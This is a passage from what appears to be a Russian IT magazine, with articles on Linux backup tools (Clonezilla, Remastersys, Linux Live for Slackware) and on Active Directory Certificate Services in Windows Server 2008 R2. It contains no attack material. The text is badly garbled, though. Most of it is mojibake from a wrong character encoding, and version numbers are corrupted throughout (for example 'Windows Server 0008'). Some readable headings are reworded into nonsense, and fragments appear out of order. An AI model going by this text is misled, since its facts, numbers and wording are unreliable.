ïðèìåðîâ åå èñïîëüçîâàíèÿ (à èìåííî — ñîçäàíèå LiveCD è âîññòàíîâëåíèå ñèñòåìû ñ åãî ïîìîùüþ). à ïîçíàêîìèòüñÿ ñ îñòàëüíûìè âîçìîæíîñòÿìè ïðîãðàììû ìîæíî â äîêóìåíòàöèè èëè íà ñàéòå ðàçðàáîò÷èêîâ. Çàãðóçèñü ñ áîëâàíêè Clonezilla Live. ïîæàëóé.org/download/sourceforge/ ISO-îáðàç Clonezilla Live è çàïèøè åãî íà áîëâàíêó. ìû è íàçâàëè ñàìîå ãëàâíîå. ñ âèäåîêàðòîé). Ïðîãðàììà ðàáîòàåò ñ óñòðîéñòâàìè (äèñêàìè. Äàëåå íóæíî âûáðàòü ðàñêëàäêó êëàâèàòóðû. à íå Need For Speed!) è èç ñåòè MS Windows (samba_server). êîòîðûå ìîãóò èñïîëüçîâàòüñÿ âïîñëåäñòâèè äëÿ ñîçäàíèÿ êàê LiveDVD. âñå äîâîëüíî ïðîñòî. íàïðèìåð. Ñîçäàííûé ôàéë (ôàéëû) áóäåò ñîõðàíåí â êàòàëîãå /home/partimag. Òàêæå îáðàç ìîæíî ïîëó÷èòü (èëè çàïèñàòü) ïî SSH. Åñëè âîçíèêíóò ïðîáëåìû (íàïðèìåð. Ïî÷åìó èìåííî Slackware îïèñàí â ýòîé ñòàòüå? Äà ïîòîìó ÷òî ýòîìó îòëè÷íîìó äèñòðèáóòèâó ïî÷åìó-òî óäåëÿåòñÿ ìàëî âíèìàíèÿ íà ôîíå «ïîïñîâûõ» äèñòðîâ âðîäå Ubuntu. Äàëåå íóæíî âûáðàòü îäíó èç êîìàíä. Fedora èëè Mandriva. ïîýòîìó ïðè ñîçäàíèè/ âîññòàíîâëåíèè áýêàïà âñå ðàâíî. CLONEZILLA: БЕСПЛАТНЫЙ АНАЛОГ NORTON GHOST Clonezilla — ïðîãðàììà íåïðîñòàÿ. 10. NFS (Network File System. Remastersys Backup óñòàíàâëèâàåòñÿ íà êîìïüþòåð. ê ñîæàëåíèþ. Ñêà÷àé ñ http://clonezilla. Áóäü âíèìàòåëåí.list Äîáàâü â íåãî ñëåäóþùóþ ñòðîêó: # Åñëè ó òåáÿ óñòàíîâëåí GRUB v1 123 . âûáåðè âàðèàíò «Don"t touch keymap». 9. òàê è LiveUSB. 3. Ðåæèì device-device èñïîëüçóåòñÿ äëÿ áýêàïà ðàçäåëà. òàê è LiveUSB. à åñëè âîññòàíàâëèâàåøü îáðàç. êóäà áóäåò ñîõðàíåí îáðàç. Ýòîò ñêðèïò ïîçâîëÿåò ñîçäàòü êàê LiveCD. Ðóññêîãî. 2. Âûáåðè êîìàíäó «Start Clonezilla». ïîýòîìó îíà íå ïîäîéäåò òåáå.äðóãèå äèñòðèáóòèâû. 8. ïðè ýòîì ñàì áýêàï áóäåò ïîìåùåí íà äðóãîé ðàçäåë. èëè îòêóäà îí áóäåò ïðî÷èòàí (â ñëó÷àå âîññòàíîâëåíèÿ ñèñòåìû ïî îáðàçó).

FreeBSD. Ìíå áîëüøå íðàâèòñÿ îïöèÿ backup. êàê ñêîïèðóåøü îáðàç äèñòðèáóòèâà â äðóãîé êàòàëîã. NetBSD. OpenBSD). Îñíîâíûå îñîáåííîñòè Clonezilla • Ïîëíîñòüþ áåñïëàòíà (ðàñïðîñòðàíÿåòñÿ ïî ëèöåíçèè GPL). Ext4. ñîçäàåò ISO-îáðàç äèñòðèáóòèâà. • dist — ñîçäàíèå äèñòðèáóòèâíîãî îáðàçà. XFS. NTFS. Çàïóñòèòü åå ìîæíî êîìàíäîé sudo remastersys-gui Äëÿ ñîçäàíèÿ LiveUSB â Ubuntu èñïîëüçóåòñÿ ñòàíäàðòíàÿ ïðîãðàììà.geekconnection. • Clonezilla ìîæåò ñîõðàíèòü íå òîëüêî îòäåëüíî âçÿòûé ðàçäåë. 124 Процесс загрузки Debian • clean — óäàëåíèå âðåìåííûõ ôàéëîâ. íî òîëüêî ïîñëå òîãî. ôîí ðàáî÷åãî ñòîëà. VMFS (VMWare ESX). ïðè óñëîâèè.html — îáçîð Clonezilla (äëÿ îáùåãî ðàçâèòèÿ) • http://wiki. çàäàåò èìÿ ISO-îáðàçà. • cdfs — ñîçäàíèå ôàéëà ñ ôàéëîâîé ñèñòåìîé áåç ñîçäàíèÿ ISO-îáðàçà (ïîäõîäèò.iso] Ïðîéäåìñÿ ïî îïöèÿì: • backup — ñîçäàíèå ðåçåðâíîé êîïèè äèñòðèáóòèâà. êîòîðûå îáðàçóþòñÿ â ïðîöåññå ñîçäàíèÿ äèñòðèáóòèâà. Òî æå ñàìîå. • iso — èñïîëüçóåòñÿ ïî óìîë÷àíèþ. JFS. Ext3. íî è MS Windows. •[filename. ôàéë ïîìåùàåòñÿ â êàòàëîã /home/remastersys. åñëè õî÷åøü ñîçäàòü ISO-îáðàç äðóãîé ïðîãðàììîé). ïîçâîëÿþùèìè çàïóñòèòü òó èëè èíóþ ôóíêöèþ ïðîãðàììû). • Ïîääåðæêà LVM2 (LVM ver 0 íå ïîääåðæèâàåò). html — èñïîëüçîâàíèå Remastersys â Ubuntu XÀÊÅÐ 00 /141/ 00 . ÷òî ìîæåò óâåëè÷èòü ðàçìåð îáðàçà. Åñëè òåáå áîëüøå íðàâèòñÿ GUI. èíà÷å îí òîæå áóäåò óäàëåí. NetBSD è OpenBSD.cyberciti.SYN/ACK Загрузочное подбор Clonezilla Live deb http://www. Íî òîëüêî óáåäèñü.geekconnection. íî áåç êîïèðîâàíèÿ ïîëüçîâàòåëüñêèõ äàííûõ èç êàòàëîãà /home.org/remastersys/ubuntu.centos. ãðàôè÷åñêàÿ òåìà. HFS (MacOS). ÷òîáû â äîìàøíåì êàòàëîãå íå áûëî íè÷åãî ëèøíåãî (òîãî. â òîì ÷èñëå ìåíþ.geekconnection. UFS (FreeBSD.org/ SettingUpClonezillaDRBLonUbuntu — êàê íàñòðîèòü Clonezilla/DRBL-ñåðâåð íà áàçå Ubuntu • http://www.org/remastersys/ repository ubuntu/ # Åñëè ó òåáÿ óñòàíîâëåí GRUB2 deb http://www. ReiserFS. • Ïîääåðæêà GRUB âåðñèé 0 è 0.org/HowTos/PXE/Clonezilla — êàê íàñòðîèòü Clonezilla/DRBL-ñåðâåð íà áàçå CentOS/Fedora • https://wiki. Mac OS (Intel). ïîýòîìó òû ìîæåøü êëîíèðîâàòü íå òîëüêî Linux.org/remastersys/ repository karmic/ Ñîõðàíè ôàéë è ââåäè äâå êîìàíäû: sudo apt-get update sudo apt-get install remastersys Ôîðìàò âûçîâà remastersys ñëåäóþùèé: sudo remastersys backup|clean|dist [cdfs|iso] [filename. • Ïîääåðæèâàåò ôàéëîâûå ñèñòåìû Ext2.iso] — ïîñëåäíèé ïàðàìåòð. âèäåî). ÷òî è backup. íàïðèìåð. âêëþ÷àÿ ïîëüçîâàòåëüñêèå äàííûå (êàòàëîã /home).edubuntu. òî ìîæåøü èñïîëüçîâàòü GUI-âåðñèþ ïðîãðàììû (íè÷åãî îñîáåííîãî îíà èç ñåáÿ íå ïðåäñòàâëÿåò — òîëüêî îêîøêî ñ ïðÿìîóãîëüíûìè íåêðàñèâûìè êíîïêàìè. FAT. íî è âåñü æåñòêèé äèñê ñî âñåìè ðàçäåëàìè.biz/tips/download-linuxclonezilla-to-clone-system.org/clonezilla-server-edition/ — èñïîëüçîâàíèå Clonezilla Server Edition • http://www. Îáÿçàòåëüíî ââåäè ýòó êîìàíäó ïîñëå ñîçäàíèÿ äèñòðèáóòèâà (äëÿ ýêîíîìèè ìåñòà). Reiser4. ÷òî êîìïüþòåðû ïîääåðæèâàþò PXE è Wake-on-LAN. ìóçûêà. çàïóñòèòü êîòîðóþ ìîæíî êîìàíäîé ÑèñòåìàÆ Àäìèíèñòðèðî- Ccûëêè • http://clonezilla. • Âåðñèÿ Clonezilla SE (Server Edition) ïîääåðæèâàåò Multicast äëÿ ìàññîâîãî êëîíèðîâàíèÿ ïî ñåòè. ïîñêîëüêó ïðè ñîçäàíèè îáðàçà ñîõðàíÿþòñÿ è íàñòðîéêè ïîëüçîâàòåëÿ.

êàê Ubuntu. Âñå íåîáõîäèìîå äëÿ ñáîðêè (aufs.  Slackware 03 èñïîëüçóåòñÿ 0. • Ñêà÷àé ñêðèïòû Linux Live ñ http://www.6. Äëÿ áýêàïà êîìïîâ. • Çàïóñòè . Î÷åíü õîðîøèé äèñòðèáóòèâ. 0 Ãá áóäåò ìàëîâàòî) è íàæìè êíîïêó «Make startup disk».  ðåçóëüòàòå ïîÿâèòñÿ êàòàëîã ñ äàííûìè LiveCD — /tmp/live_data_NNNN. ÷òîáû â òâîåì LiveCD èñïîëüçîâàëàñü ïîñëåäíÿÿ âåðñèÿ ÿäðà. • Óäàëè âñå ëèøíåå.33. êàêóþ ïðîãó âûáðàòü? Åñëè ó òåáÿ óñòàíîâëåíà Debian èëè Ubuntu. ÷òîáû óìåíüøèòü ðàçìåð äèñòðèáóòèâà. ïóñòü è íå òàêîé óäîáíûé. ïîäîéäåò Clonezilla — íàâåðíîå. ñàìûì ïðîñòûì âàðèàíòîì áóäåò èñïîëüçîâàíèå Remastersys Backup. ëèøíèå man"û. åñëè õî÷åøü ñîçäàòü ISO-îáðàç èëè bootinst. ïîäêëþ÷è ôëåøêó (4 Ãá èëè áîëüøå.27. íî ó÷èòûâàÿ. À âîò ôàíàòàì Slackware äîëæíû ïîíðàâèòüñÿ ñêðèïòû Live. Äëÿ ñîçäàíèÿ LiveCD â Slackware âûïîëíè ñëåäóþùèå äåéñòâèÿ: • Ñîáåðè (åñëè òû åùå ýòîãî íå ñäåëàë) ìîäóëè ÿäðà: aufs. Çàïóñòè åå.linux-live. z 125 .org). Åñëè ñîáèðàòü ÿäðî ëåíü. ãäå NNNN — ñëó÷àéíîå ÷èñëî. çàòî î÷åíü íàäåæíûé.linux-live. äîñòóïíî ÿäðî âåðñèè 0.config. òåáå çàõî÷åòñÿ ñîáðàòü ÿäðî âðó÷íóþ. ëó÷øèé âûáîð äëÿ àäìèíà. åñëè õî÷åøü èçìåíèòü ïåðåìåííûå ïî óìîë÷àíèþ.sh.remastersys-gui Программа с целью создания LiveUSB Выбор языка Clonezilla Выбор раскладки âàíèå Æ Ñîçäàíèå çàãðóçî÷íîãî USB-äèñêà. ðàáîòàþùèõ ïîä ñàìûìè ðàçíûìè ÎÑ. âîçìîæíî./build (íàõîäèòñÿ â /tmp) ñ ïðàâàìè root. ïðîùå áóäåò èñïîëüçîâàòü Clonezilla äëÿ áýêàïà ñëàêè. åãî ìîæíî çàïîëó÷èòü â ãîòîâîì âèäå íà ñàéòå Linux Live (http://www.6. XÀÊÅÐ 00 /141/ 00 LINUX LIVE: БЭКАП В SLACKWARE Òåïåðü î÷åðåäü äîøëà è äî Slackware.sh äëÿ ñîçäàíèÿ LiveUSB. squashfs. íàâåðíîå.27 — íå ñàìîå íîâîå è äëÿ àðõèòåêòóðû i486. Ïðàâäà. íàïðèìåð. • Çàïóñòè make_iso. ïîýòîìó. squashfs è lzma) òû íàéäåøü íà ñàéòå Linux Live. ÷òî íóæíî áóäåò ïåðåêîìïèëèâàòü ÿäðî.org è ðàñïàêóé èõ â /tmp. ×åðåç íåêîòîðîå âðåìÿ çàãðóçî÷íàÿ ôëåøêà áóäåò ãîòîâà. SUMMARY Èòàê. íî îáû÷íî Slackware íå óñòàíàâëèâàåòñÿ íà ñàìûå íîâûå êîìïû ñ 04-ðàçðÿäíûìè ïðîöåññîðàìè. • Îòðåäàêòèðóé .

êîòîðûå ìîæíî èñïîëüçîâàòü äëÿ óñòàíîâêè CA.it-university. òàê êàê øàáëîíû õðàíÿòñÿ íà íåì. òî ýòî íàäî äåëàòü â äâà ýòàïà. Äîâîëüíî ñåðüåçíûå îãðàíè÷åíèÿ ïî èñïîëüçîâàíèþ AD CS ïðèñóòñòâóþò è â ñòàíäàðòíîé ðåäàêöèè Server 2008 (âîçìîæíîñòü óñòàíîâêè òîëüêî êîìïîíåíòà CA.  òî âðåìÿ. Âñå êîìïîíåíòû ìîæíî ïîñòàâèòü íà îäèí ñåðâåð. Ðàñøèðåíèå NDES äëÿ IIS êîíôèãóðèðóåòñÿ ÷åðåç êëþ÷è ðååñòðà HKEY_LOCAL_ROOT\Software\ Microsoft\Cryptography\MSCEP. Äëÿ ðàáîòû áîëüøèíñòâà êîìïîíåíòîâ òàêæå òðåáóåòñÿ IIS. 2. Äëÿ ïîëíîöåííîé ðàáîòû AD CS òðåáóåòñÿ AD DS (Active Directory Domain Services). Microsoft порядочно без дураков переработала старую службу Certificate Services. Êàê è ðàíüøå. Ñëóæáû ñåðòèôèêàöèè ÿâëÿþòñÿ õîðîøèìè êàíäèäàòàìè íà âèðòóàëèçàöèþ.ru Что нового в AD CS? CERTIFICATE SERVICES В WINDOWS SERVER 0008 R2 VS. à íà Server Core âñå êîìïîíåíòû AD CS ìîæíî óñòàíàâëèâàòü. Íàïðèìåð. à ïîñëåäíèå äâà êîìïîíåíòà ïîÿâèëèñü òîëüêî â Windows Server 0008 R2. 6.  ñîñòàâ ðîëè AD CS â Windows Server 0008 R2 âõîäèò øåñòü êîìïîíåíòîâ: 1. íî ðåêîìåíäóåòñÿ ðàçíîñèòü CA. Ïðè ýòîì ìîæíî îáîéòèñü áåç îáíîâëåíèÿ ñõåìû – AD CS â Server 0008 è â Server 0008 R2 áóäåò ðàáîòàòü è íà ñõåìå. Certificate Enrollment Web Service ïîçâîëÿåò êëèåíòàì àâòîìàòè÷åñêè ïîäàâàòü çàÿâêè íà ñåðòèôèêàòû è ïîëó÷àòü èõ ïî HTTPS.  Windows Server 0008 áûëè äîáàâëåíû íîâûå COM-îáúåêòû (ïîäðîáíóþ èíôîðìàöèþ î ñâîéñòâàõ ICertSrvSetup ìîæíî íàéòè íà MSDN). сертификаты нужны к надежной аутентификации. êîòîðûé äîëæåí íàõîäèòüñÿ â %SYSTEMROOT%. 4. Ñëóæáà ïîäà÷è çàÿâîê íà ñåòåâûå óñòðîéñòâà èñïîëüçóåò ïðîòîêîë SCEP (Simple Certificate Enrollment Protocol). 3. направленных получи оборудование безопасности.  ïðåäûäóùèõ âåðñèÿõ Windows Server â ñîñòàâ Certificate Services âõîäèëè òîëüêî ïåðâûå äâà êîìïîíåíòà. Certificate Enrollment Policy Web Service ïîçâîëÿåò îïðåäåëèòü ïîëèòèêè äëÿ àâòîìàòè÷åñêîé ðåãèñòðàöèè ñåðòèôèêàòîâ è ïåðåäàâàòü èõ êëèåíòàì ïî HTTPS. Online Responder ïîçâîëÿåò êëèåíòàì ïîëó÷àòü èíôîðìàöèþ î ñòàòóñå îäíîãî ñåðòèôèêàòà áåç ïîëó÷åíèÿ ñïèñêîâ îòçûâà. Ìû ìîæåì óñòàíîâèòü ðîëü Active Directory Certificate Services (AD CS) è íà ñåðâåð. 126 ВАРИАНТЫ УСТАНОВКИ И УПРАВЛЕНИЯ AD CS AD CS íåëüçÿ óñòàíîâèòü íà Itanium ðåäàêöèè Windows Server 0008. êîòîðûå íàçûâàëèñü Certificate Services CA è Certificate Services Web Enrollment Support. Åñëè íåîáõîäèìî óñòàíîâèòü íà ñåðâåð äâà êîìïîíåíòà Certification Authority è Certificate Enrollment Web Service. êîòîðàÿ ïîñòàâëÿåòñÿ ñ Windows Server 0003. отправки S/MIME-сообщений равно других действий.  Windows Server 0008 ñëóæáû ñåðòèôèêàöèè òåïåðü îòíîñÿòñÿ ê ñëóæáàì Active Directory. создания SSL-соединений. Íî äëÿ ðàáîòû Certificate Enrollment Web Services óæå íåîáõîäèìà ñõåìà íå íèæå 07 âåðñèè. равно пользу кого того. www.inf. íåâîçìîæíîñòü èñïîëüçîâàòü Restricted Enrollment Agent è äðóãèå íîâøåñòâà). êîòîðûé áûë ðàçðàáîòàí Cisco. С каждым годом использование сертификатов растет. Network Device Enrollment Service (NDES) èñïîëüçóåòñÿ ìàðøðóòèçàòîðàìè è äðóãèìè ñåòåâûìè óñòðîéñòâàìè áåç ó÷åòíûõ çàïèñåé â äîìåíå äëÿ ïîëó÷åíèÿ ñåðòèôèêàòîâ. äëÿ íàñòðîéêè ïàðàìåòðîâ óñòàíîâêè ïðèìåíÿåòñÿ êîíôèãóðàöèîííûé ôàéë CAPolicy.ru. êîìïüþòåðàì è ñëóæáàì. êàê Web Service ïîëó÷àåò èíôîðìàöèþ î ïîëèòèêàõ èç AD ïî ïðîòîêîëó LDAP. êîòîðûå ñëóæàò äëÿ âûäà÷è ñåðòèôèêàòîâ ïîëüçîâàòåëÿì. Certification authorities (CAs) – ýòîò êîìïîíåíò ïîçâîëÿåò óñòàíîâèòü è íàñòðîèòü êîðíåâîé (root) èëè ïîä÷èíåííûé (subordinate) öåíòðû ñåðòèôèêàöèè (îíè æå «óäîñòîâåðÿþùèå öåíòðû»). ÷àñòü èç êîòîðûõ áûëè ñíÿòû â R2 (íàêîíåö â ñòàíäàðòíîé ðåäàêöèè ïîÿâèëàñü âîçìîæíîñòü ðàáîòàòü ñ øàáëîíàìè ñåðòèôèêàòîâ âåðñèé âûøå ïåðâîé). 5. с целью удовлетворять новым требованиям. Web enrollment íåîáõîäèì äëÿ çàïðîñà ñåðòèôèêàòîâ è ïîëó÷åíèÿ èíôîðìàöèè îá îòîçâàííûõ ñåðòèôèêàòàõ ÷åðåç âåá-áðàóçåð. êîòîðàÿ èäåò ñ Windows Server 0008 R2. òàê êàê ïðè óñòàíîâêå CA íåëüçÿ âûáðàòü äëÿ óñòàíîâêè êîìïîíåíò Web Service. íà÷èíàÿ ñ Windows Server 0008 R2. íî ÷àñòü ôóíêöèé ïðè ýòîì áóäåò íåäîñòóïíà. íå âõîäÿùèé â äîìåí. Íàïðèìåð. ìîæíî àâòîìàòèçèðîâàòü óñòàíîâêó è íàñòðîéêó ñ ïîìîùüþ VBScript. Online Responder è Web enrollment íà ðàçëè÷íûå ñåðâåðà.SYN/ACK Лучник милостивая Óñòàíîâêà AD CS ïðîèçâîäèòñÿ ÷åðåç äîáàâëåíèå ðîëåé â îñíàñòêå Server Manager. äëÿ óïðàâëåíèÿ øàáëîíàìè òðåáóåòñÿ êîíòðîëëåð äîìåíà. Íî ïðè ýòîì î÷åíü âàæíî îáåñïå÷èòü íåîáõîäèìûé óðîâåíü XÀÊÅÐ 00 /141/ 00 . WINDOWS SЕRVER 0003 Как известно.

êîãäà â îðãàíèçàöèè ðàçâåðíóòî íåñêîëüêî CA.  ýòîì ñëó÷àå. òî çàêðûòûå êëþ÷è íå áóäóò ïîòåðÿíû è íå ïðèäåòñÿ ïåðåñòðàèâàòü âñþ èíôðàñòðóêòóðó. êîòîðîå èñïîëüçóåò ñåðòèôèêàòû ñ íåñòàíäàðòíûìè ðàñøèðåíèÿìè. äîñòóïíîñòü AIA (Authority Information Access) è ñïèñêîâ îòçûâà. Ñåðòèôèêàòû ïî øàáëîíàì òðåòüåé âåðñèè ìîæíî èçäàâàòü è íà CA íà Windows Server 0003. ñðåäè êîòîðûõ àëãîðèòìû ÝÖÏ è îáìåíà êëþ÷àìè íà îñíîâå ýëëèïòè÷åñêèõ êðèâûõ. Microsoft îôèöèàëüíî ïîääåðæèâàåò âèðòóàëèçàöèþ ñëóæá ñåðòèôèêàöèè íà÷èíàÿ ñ Windows Server 0003 SP1. êîòîðûå èäóò â ñîñòàâå ÎÑ è çàäàâàòü äëÿ íèõ òîëüêî ðàçðåøåíèÿ íà âûäà÷ó ñåðòèôèêàòîâ. ШАБЛОНЫ СЕРТИФИКАТОВ Ñ ïîìîùüþ øàáëîíîâ ñåðòèôèêàòîâ ìîæíî îïðåäåëèòü ôîðìàò è ñîäåðæèìîå èçäàâàåìîãî ñåðòèôèêàòà. Òîëüêî Enterprise CA ìîãóò èñïîëüçîâàòü øàáëîíû ñåðòèôèêàòîâ. óòèëèòû certutil. Øàáëîíû âòîðîé âåðñèè ïîääåðæèâàþò âîññòàíîâëåíèå è àðõèâàöèþ êëþ÷åé. èç ðåçåðâíîé êîïèè). òî îíè íå ïîïàäàþò â ðåçåðâíóþ êîïèþ ñîñòîÿíèÿ ñèñòåìû.msc). êîòîðûå íåëüçÿ èçìåíÿòü – èíà÷å ãîâîðÿ.msc) äëÿ óïðàâëåíèÿ îäíîèìåííûì êîìïîíåíòîì. ÷òî èñïîëüçîâàíèå ñåðòèôèêàòîâ íà îñíîâå NSA Suite B Cryptography (ê êîòîðûì îòíîñÿòñÿ àëãîðèòìû íà îñíîâå ýëëèïòè÷åñêèõ êðèâûõ) ïîääåðæèâàåòñÿ òîëüêî ÎÑ.msc).exe.  Windows Server 0008 ïîÿâèëèñü øàáëîíû âåðñèè 0. èñïîëüçîâàòü ñåðòèôèêàò ñ êëþ÷îì äëÿ àëãîðèòìà. â Windows XP è Windows Server 0003. Áîëüøàÿ ÷àñòü èíñòðóìåíòîâ ñóùåñòâîâàëà è â ïðåäûäóùèõ âåðñèÿõ. Ðàíüøå íàäî áûëè ïèñàòü ïîäðîáíûå èíñòðóêöèè äëÿ àäìèíèñòðàòîðîâ. ñêðèïòû èëè êîìàíäíóþ ñòðîêó. Enterprise PKI ïîçâîëÿåò îäíîâðåìåííî îòñëåæèâàòü ñîñòîÿíèå è äîñòóïíîñòü íåñêîëüêèõ CA. Ýòîãî ìîæíî äîñòè÷ü. Êðîìå òîãî.  Windows Server 0008 R2 è Windows 0 áûë äîáàâëåí èíòåðôåéñ ïðîãðàììèðîâàíèÿ (Certificate Template API). èñïîëüçóþùåãî ýëëèïòè÷åñêèå êðèâûå.0 è ïîääåðæêà ðàíåå íåïîääåðæèâàåìûõ êðèïòîãðàôè÷åñêèõ àëãîðèòìîâ. Äëÿ óïðàâëåíèÿ è íàñòðîéêè AD CS ìîæíî èñïîëüçîâàòü MMC-îñíàñòêè. èñïîëüçóÿ àïïàðàòíûå êðèïòîãðàôè÷åñêèå ìîäóëè (HSM). íà÷èíàÿ ñ Windows Vista. ê êîòîðîé ìîæíî ïîëó÷èòü äîñòóï ÷åðåç %SYSTEMDRIVE%\Users\All Users\Microsoft\Crypto\Keys. êîòîðàÿ ðàíåå áûëà ÷àñòüþ Windows Server 0003 Resource Kit è íàçûâàëàñü PKI Health Tool. òàê êàê êëþ÷è îñòàíóòñÿ â HSM. â òàêîé ñèòóàöèè: ðàçðàáîò÷èêè ïèøóò ïðèëîæåíèå. íàäî åùå ñîçäàòü ðåçåðâíóþ êîïèþ çàêðûòûõ êëþ÷åé. Èñïîëüçîâàíèå øàáëîíîâ òðåòüåé âåðñèè äëÿ ðàáîòû ñî ñìàðò-êàðòàìè òàêæå çàòðóäíåíî. Äîáàâèëàñü îñíàñòêà Online Responder Management (ocsp. ×òîáû ìîæíî áûëî âîññòàíîâèòü èëè ìèãðèðîâàòü CA ïðè ñîçäàíèè è èñïîëüçîâàíèè â êà÷åñòâå ðåçåðâíîé êîïèè System State Backup. ìîæíî èñïîëüçîâàòü òîëüêî òå øàáëîíû. Certification Authority (certsrv. êîòîðûé ïîçâîëÿåò ïðè óñòàíîâêå ïðèëîæåíèÿ äîáàâëÿòü íîâûå øàáëîíû ñåðòèôèêàòîâ. Íåêîòîðûå èçìåíåíèÿ ïðîèçîøëè è â ðåçåðâíîì êîïèðîâàíèè AD CS â Server 0008 R2. äàæå åñëè âèðòóàëêà öåëèêîì ïîïàäåò ê çëîóìûøëåííèêó (íàïðèìåð.  Windows Server 0000 ïðèñóòñòâîâàëè òîëüêî øàáëîíû ïåðâîé âåðñèè. äàæå åñëè êëþ÷ áûë ñãåíåðèðîâàí ñ èñïîëüçîâàíèåì CNG. Ñòîèò îòìåòèòü. â ñîñòàâ ÎÑ âîøëà îñíàñòêà Enterprise PKI (pkiview. Òî åñòü íåëüçÿ. íàïðèìåð. è èíôîðìàöèþ î íèõ ìîæíî ïîëó÷èòü èç íåñêîëüêèõ èñòî÷íèêîâ.msc). à òàêæå äîïîëíèòåëüíûå àëãîðèòìû õåøèðîâàíèÿ. à òàêæå çàäàòü ðàçðåøåíèÿ XÀÊÅÐ 00 /141/ 00 íà çàïðîñ ñåðòèôèêàòîâ äëÿ ïîëüçîâàòåëåé è êîìïüþòåðîâ. Âòîðàÿ è òðåòüÿ âåðñèè øàáëîíîâ ïîääåðæèâàþòñÿ â ðåäàêöèÿõ Enterprise è Datacenter. Äàííàÿ âîçìîæíîñòü ìîæåò î÷åíü ïðèãîäèòüñÿ. ïðîâåðÿåò ñòàòóñ ñåðòèôèêàòîâ CA. òàêèõ êàê îñíàñòêè Certificates (certmgr. íàïðèìåð.áåçîïàñíîñòè äëÿ çàêðûòûõ êëþ÷åé. è àâòîìàòè÷åñêóþ âûäà÷ó ñåðòèôèêàòîâ (certificate autoenrollment) è áûëè ïðåäñòàâëåíû â Windows Server 0003. Äëÿ ýòîãî ìîæíî âîñïîëüçîâàòüñÿ êîìàíäîé certutil –backupKey <ïóòü_äëÿ_ðåçåðâíîé_êîïèè> èëè îñíàñòêîé Certification Authority. òàê êàê CSP (Cryptography Service Provider) äëÿ ñìàðò-êàðò íå ïîääåðæèâàþò íîâûå àëãîðèòìû CNG.msc) è Certificate Templates (certtmpl. Ñ ïîìîùüþ ðàçíîöâåòíûõ îòìåòîê ìîæíî ñóäèòü î äîñòóïíîñòè è ñîñòîÿíèè PKI. ÷òîáû îíè ñîçäàëè â 127 . CNG – ýòî çàìåíà CryptoAPI. Òàê êàê çàêðûòûå êëþ÷è òåïåðü õðàíÿòñÿ â ñêðûòîé ïàïêå %SYSTEMDRIVE%\ProgramData\Microsoft\Crypto\Keys.exe è ñertreq. õîòÿ ìîæíî èñïîëüçîâàòü êëàññè÷åñêèå àëãîðèòìû. Pkiview óäîáíî èñïîëüçîâàòü. òàêèå êàê RSA.  ðåäàêöèè Standard íîâûå âåðñèè øàáëîíîâ ïîääåðæèâàþòñÿ òîëüêî â Server 0008 R2. ãëàâíàÿ íîâàÿ âîçìîæíîñòü êîòîðûõ – ðàáîòà ñ CNG (Cryptography Next Generation). ðàáîòàþùèõ ïî ðàçëè÷íûì ïðîòîêîëàì. â êîòîðîé ðåàëèçîâàíà ïîääåðæêà àëãîðèòìîâ èç CryptoAPI 0.

òàê è ïðè èçìåíåíèè èíôîðìàöèè î âëàäåëüöå. è ñåðòèôèêàòû. íî è ïàðîëè.dll. â êîìàíäèðîâêàõ. ÷òî è CA. ïîÿâèâøèéñÿ â Server 0008 R2. ÷òî áûëî. ÷òî îí íå íàðóøàåò îãðîìíîå êîëè÷åñòâî îãðàíè÷åíèé. íà÷èíàÿ ñ Windows Vista. Äëÿ ðàáîòû Online Responder òðåáóåòñÿ IIS. Äëÿ ýòîãî íàäî âûïîëíèòü ñëåäóþùèå øàãè: 1. áûë ëè îòîçâàí ñåðòèôèêàò. òî öåëåñîîáðàçíî èñïîëüçîâàòü ñïèñêè îòçûâà. Äîáàâèòü êîìïîíåíò Online Responder ðîëè AD CS. êîòîðûé íåîáõîäèì äëÿ ýòîãî. ìîãóò çàïðîñèòü ñåðòèôèêàò ÷åðåç âåá-èíòåðôåéñ. Òåïåðü ìîæíî äîáàâèòü íîâûé øàáëîí ïðîãðàììíî ñ ïîìîùüþ èìïîðòà ïðåäâàðèòåëüíî ýêñïîðòèðîâàííîãî øàáëîíà. ONLINE RESPONDER Ïðè ïðîâåðêå âàëèäíîñòè ñåðòèôèêàòà ñðåäè ïðî÷åãî ïðîâåðÿåòñÿ ñðîê åãî äåéñòâèÿ è ñîñòîÿíèå îòçûâà. ðàçðåøåíèå àðõèâèðîâàíèÿ êëþ÷åé òîëüêî äëÿ ñåðòèôèêàòîâ. êîòîðûå íàõîäÿòñÿ â äðóãîì ëåñå. Òàê êàê ñïèñêè ïóáëèêóþòñÿ ñ çàäàííûì èíòåðâàëîì. êîòîðàÿ áûëà íàïèñàíà ìíîãî ëåò íàçàä è äîëãî äîïîëíÿëàñü íîâûìè ôóíêöèÿìè è áàãàìè. êîíå÷íî. à â ñëó÷àå СПИСКИ ОТЗЫВА VS. íî áûë ñóùåñòâåííî ïåðåðàáîòàí. Èõ ìîæíî èñïîëüçîâàòü êàê àëüòåðíàòèâó èëè â äîïîëíåíèå ê ñïèñêàì îòçûâà ñåðòèôèêàòîâ. ïðèñóòñòâîâàë è ðàíåå. ÷åðåç îñíàñòêó Certificates. à èíôîðìàöèè îá ýòîì â CRL åùå íåò. ÷åì öåíòð ñåðòèôèêàöèè. ×òîáû óçíàòü. ñîçäàííîãî â òåñòîâîé ñðåäå. òî ìîæíî ñ ïîìîùüþ ãðóïïîâûõ ïîëèòèê íàñòðîèòü àâòîìàòè÷åñêóþ ïîäà÷ó è îáðàáîòêó çàÿâîê. ÷òî åìó áûë óñòàíîâëåí íîâûé ñåðòèôèêàò èëè îáíîâëåí ñòàðûé.  ñëó÷àå åñëè êëèåíòó òðåáóåòñÿ èíôîðìàöèÿ î ñòàòóñå áîëüøîãî êîëè÷åñòâà ñåðòèôèêàòîâ. áûëà çàìåíåíà íà íîâóþ – CertEnroll. êîòîðûé áóäåò àâòîìàòè÷åñêè ïðåäëîæåíî óñòàíîâèòü. èëè äëÿ êîìïüþòåðîâ. Ïðè ýòîì â êà÷åñòâå àóòåíòèôèêàöèè ìîæíî èñïîëüçîâàòü íå òîëüêî Kerberos. ñòàòóñ êîòîðûõ áûë èçìåíåí ïî ñðàâíåíèþ ñ ïðåäûäóùèì ñïèñêîì îòçûâà. êîòîðûì íàäî îáíîâëÿòü ñåðòèôèêàòû. ðóêàìè ñîçäàòü PKCS#10 çàïðîñ è ñ ïîìîùüþ êîìàíäíîé ñòðîêè è certreq ïåðåäàòü çàïðîñ íà CA. òàê êàê îêàçàëîñü ëåã÷å íàïèñàòü ñ íóëÿ. Åñëè íåîáõîäèìî 